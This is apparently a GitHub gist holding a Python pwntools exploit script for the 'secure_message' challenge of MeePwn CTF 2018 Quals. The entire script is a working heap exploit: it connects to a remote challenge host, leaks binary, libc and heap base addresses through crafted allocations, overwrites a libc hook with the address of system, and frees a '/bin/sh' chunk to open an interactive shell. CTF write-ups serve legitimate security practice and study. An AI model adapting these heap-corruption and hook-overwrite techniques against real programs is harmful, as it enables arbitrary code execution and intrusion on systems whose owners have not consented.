Created
July 15, 2018 19:36
-
-
Save hama7230/d1ae82a6c40ea30376e7f4c354517641 to your computer and use it in GitHub Desktop.
MeePwn CTF 2018 Quals secure_message
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
from pwn import * | |
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window | |
# context(terminal=['tmux', 'new-window']) # open new window | |
# libc = ELF('./libc-2.27.so') | |
elf = ELF('./secure_message') | |
context(os='linux', arch=elf.arch) | |
RHOST = "178.128.87.12" | |
RPORT = 31337 | |
LHOST = "127.0.0.1" | |
LPORT = 31337 | |
def section_addr(name, elf=elf): | |
return elf.get_section_by_name(name).header['sh_addr'] | |
def dbg(ss): | |
log.info("%s: 0x%x" % (ss, eval(ss))) | |
conn = None | |
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option | |
if opt in 'rl': | |
conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt]) | |
elif opt == 'd': | |
gdbscript = """ | |
continue | |
""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint)) | |
conn = gdb.debug(['./secure_message'], gdbscript=gdbscript) | |
else: | |
conn = process(['./secure_message']) | |
# conn = process(['./secure_message'], env={'LD_PRELOAD': './libc-2.27.so'}) | |
if opt == 'a': gdb.attach(conn) | |
def register(name, password, desc): | |
conn.sendlineafter('Choice: ', '1') | |
conn.sendafter('Username:', name) | |
conn.sendafter('Password:', password) | |
conn.sendafter('Describe your self', desc) | |
def login(name, password): | |
conn.sendlineafter('Choice: ', '2') | |
conn.sendafter('Username:', name) | |
conn.sendafter('Password:', password) | |
conn.recvuntil('Hello:') | |
def quit(): | |
conn.sendlineafter('Choice: ', '3') | |
def add(name, size, content): | |
conn.sendlineafter('Choice: ', '1') | |
conn.sendlineafter('Name: ', name) | |
conn.sendlineafter('Size:', str(size)) | |
time.sleep(0.1) | |
conn.send(content) | |
def edit(idx, size, content): | |
conn.sendlineafter('Choice: ', '3') | |
conn.sendlineafter('edit?', str(idx)) | |
conn.sendlineafter('Size:', str(size)) | |
time.sleep(0.1) | |
conn.send(content) | |
def remove(idx): | |
conn.sendlineafter('Choice: ', '2') | |
conn.sendlineafter('?', str(idx)) | |
# exploit | |
log.info('Pwning') | |
register('hoge\n', 'fuga\n','a'*0x80) | |
register('b'*0x20,'b'*0x20,'b'*0x80) | |
register('c'*0x20,'c'*0x20,'c'*0x80) | |
register('d'*0x20,'d'*0x20,'d'*0x80) | |
login('hoge\n', 'fuga\n') | |
add('x'*0x18, 0xfd0, 'z'*0xfd0) | |
conn.send(p64(0xc9f68e5b26a07627)) | |
conn.send(p64(0xc9f68e5b26a07627)) | |
conn.send(p64(0xc9f68e5b26a07627)) | |
add('y'*0x18, 0xfd0, 'w'*0xfd0) | |
conn.send(p64(0xc9f68e5b26a07627+0x1000)) | |
conn.send(p64(0xc9f68e5b26a07627+0x1000)) | |
conn.send(p64(0xc9f68e5b26a07627+0x1000)) | |
edit(0, -1, 'a'*0x1f00+'\n') | |
add('', 0xff, '\n') | |
conn.send(p64(0xc9f68e5b26a07627+0x3000)) | |
conn.send(p64(0xc9f68e5b26a07627+0x3000)) | |
conn.send(p64(0)*4) | |
#conn.send(p64(0xc9f68e5b26a07627+0x2000)) | |
conn.sendlineafter('Choice: ', '4') | |
conn.recvuntil('1 - [yyyyyyyyyyyyyyyyyyyyyyyy') | |
bin_base = u64(conn.recv(6)+'\x00\x00') - 0x211d | |
dbg('bin_base') | |
conn.recvuntil('\n') | |
libc_base = u64(conn.recv(14).decode('hex')+'\x00') - 0x3ec2b0 | |
dbg('libc_base') | |
conn.recv(14) | |
heap_base = u64(conn.recv(14).decode('hex')+'\x00') - 0x250 | |
dbg('heap_base') | |
add('aaaaaa', 0x1000, 'b'*0x1000) | |
conn.send(p64(0xdeadbeef000)) | |
conn.send(p64(0xdeadbeef000)) | |
conn.send(p64(0)*4) | |
add('target', 0x100, 'c'*0x1000) | |
conn.send(p64(0xdeadbef0000)) | |
conn.send(p64(0xdeadbef0000)) | |
conn.send(p64(0)*4) | |
edit(2, 8192, 'hoge\n') | |
payload = 'd'*0xfd0 + p32(0x100) + p32(1) + p64(0xe5b26a08030 + 0x10) | |
add('aaaaaa', 0x1100, payload+'\n') | |
conn.send(p64(0x00000deadbef0000-0x1000)) | |
conn.send(p64(0x00000deadbef0000-0x1000)) | |
conn.send(p64(0)*4) | |
payload = p64(0) + p64(0x31) | |
payload += p64(0) * 5 | |
payload += p64(0x31) | |
edit(0, 0x100, payload+'\n') | |
remove(2) | |
payload = p64(0) + p64(0x31) | |
payload += p64(libc_base + 0x3ed8e8)+p64(0) * 4 | |
payload += p64(0x31) | |
edit(0, 0x100, payload+'\n') | |
add('a', 0xf00, 'hoge\n') | |
conn.send(p64(0xbeefdead000)) | |
conn.send(p64(0xbeefdead000)) | |
conn.send(p64(0)*4) | |
add('a', 0xf00, '/bin/sh\x00\n') | |
conn.send(p64(0xbeefdead000)) | |
conn.send(p64(0xbeefdead000)) | |
conn.send(p64(libc_base+0x4f440)) | |
conn.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment